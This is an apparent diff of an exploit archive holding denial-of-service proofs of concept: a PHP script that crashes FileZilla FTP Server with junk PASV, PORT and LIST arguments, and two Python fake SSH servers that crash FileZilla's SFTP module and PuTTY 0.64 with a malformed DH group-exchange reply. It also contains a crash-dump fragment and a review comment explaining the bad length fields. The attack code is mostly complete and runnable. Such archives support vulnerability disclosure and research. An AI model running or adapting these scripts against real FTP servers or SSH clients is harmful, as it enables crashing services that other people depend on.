---------------------------------------------------------------- ----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled) 07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled)
---------------------------------------------------------------- ----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C]) Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
---------------------------------------------------------------- ----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00 EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00 EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00 ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05 EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01 --> MOV BYTE PTR [ESI+7C],01
---------------------------------------------------------------- ----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477 07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477 07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477 07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477 07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477 07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477 07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477
*/ */
?> ?>
# milw0rm.com [2006-12-09] # milw0rm.com [2006-12-09]


@ -1,67 +1,67 @@
<?php <?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service # Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
# by shinnai # by shinnai
# mail: shinnai[at]autistici[dot[org] # mail: shinnai[at]autistici[dot[org]
# site: http://shinnai.altervista.org # site: http://shinnai.altervista.org
# #
# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html # special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
# and for code in php I never could write alone ;) # and for code in php I never could write alone ;)
# This one works fine also with an user with only read and list permissions enabled # This one works fine also with an user with only read and list permissions enabled
# you can change the LIST command also with NLST or NLST -al comamnds # you can change the LIST command also with NLST or NLST -al comamnds
# tested on Windows XP Professional SP2 all patched # tested on Windows XP Professional SP2 all patched
error_reporting(E_ALL); error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp'); $service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('127.0.0.1'); $address = gethostbyname('127.0.0.1');
$user="test"; $user="test";
$pass="test"; $pass="test";
$junk.="A*"; $junk.="A*";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) { if ($socket < 0) {
echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$result = socket_connect($socket, $address, $service_port); $result = socket_connect($socket, $address, $service_port);
if ($result < 0) { if ($result < 0) {
echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"; echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$out=socket_read($socket, 240); $out=socket_read($socket, 240);
echo $out; echo $out;
$in = "USER ".$user."\r\n"; $in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASS ".$pass."\r\n"; $in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASV ".$junk."\r\n"; $in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."\r\n"; $in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "LIST ".$junk."\r\n"; $in = "LIST ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
socket_close($socket); socket_close($socket);
?> ?>
# milw0rm.com [2006-12-11] # milw0rm.com [2006-12-11]

platforms/windows/dos/37286.py Executable file

@ -0,0 +1,71 @@
'''
# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
# Version: 3.11.0.2
# Author: 3unnym00n
# Details:
# --------
# sftp module for filezilla based on putty's psftp component.
# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash
# Tested On: win7, xp
# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
'''
import socket
import struct
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
## do banner exchange
## send server banner
client.send('SSH-2.0-SUCK\r\n')
## recv client banner
client_banner = ''
while True:
data = client.recv(1)
if data == '\x0a':
break
client_banner += data
print 'the client banner is: %s'%client_banner.__repr__()
## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send server algorithms
client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange group
client.send('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'.decode('hex'))
## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange reply
dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
dh_gex_reply_msg += '\x09' ## padding len
dh_gex_reply_msg += '\x21' ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
dh_gex_reply_msg += 'A'*600
client.sendall(dh_gex_reply_msg)
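Review bot: The hand-built reply at the end of the hunk is internally inconsistent in two places that the field comments do not call out: the packet length `'\x00\x00\x02\x3c'` declares 572 bytes while 606 bytes follow it, and the host-key length `'\x00\x00\xff\xff'` declares 65535 bytes while only 600 are sent, so a reader cannot tell which mismatch the PoC depends on. I would replace `## dh host key len` with `## declared host key length (0xffff) deliberately exceeds the 600 bytes that follow; a parser that trusts this length instead of bounding it by the remaining packet size is what appears to be under test`, and note on the `## pl` line that the packet length is likewise smaller than the body. The framing reads (`str_pl = client.recv(4)` followed by `client.recv(pl)`) assume the 4-byte length and the full body each arrive in a single recv() on a stream socket; a short read makes struct.unpack raise or desynchronises the exchange, and neither `client` nor `soc` is closed after sendall(). platforms/windows/dos/37291.py in this commit duplicates the same code and comments, so the same notes apply there.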

70
platforms/windows/dos/37291.py Executable file

@ -0,0 +1,70 @@
'''
# Exploit title: putty v0.64 denial of service vulnerability
# Date: 5-6-2015
# Vendor homepage: http://www.chiark.greenend.org.uk
# Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe
# Version: 0.64
# Author: 3unnym00n
# Details:
# --------
# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash
# Tested On: win7, xp
# operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh root@127.0.0.1
'''
import socket
import struct
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(('127.0.0.1', 22))
soc.listen(1)
client, addr = soc.accept()
## do banner exchange
## send server banner
client.send('SSH-2.0-paramiko_1.16.0\r\n')
## recv client banner
client_banner = ''
while True:
data = client.recv(1)
if data == '\x0a':
break
client_banner += data
print 'the client banner is: %s'%client_banner.__repr__()
## do key exchange
## recv client algorithms
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send server algorithms
client.send('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'.decode('hex'))
## do dh key exchange
## recv dh group exchange request
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange group
client.send('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'.decode('hex'))
## recv dh group exchange init
str_pl = client.recv(4)
pl = struct.unpack('>I', str_pl)[0]
client.recv(pl)
## send dh group exchange reply
dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
dh_gex_reply_msg += '\x09' ## padding len
dh_gex_reply_msg += '\x21' ## dh gex reply
dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
dh_gex_reply_msg += 'A'*600
client.sendall(dh_gex_reply_msg)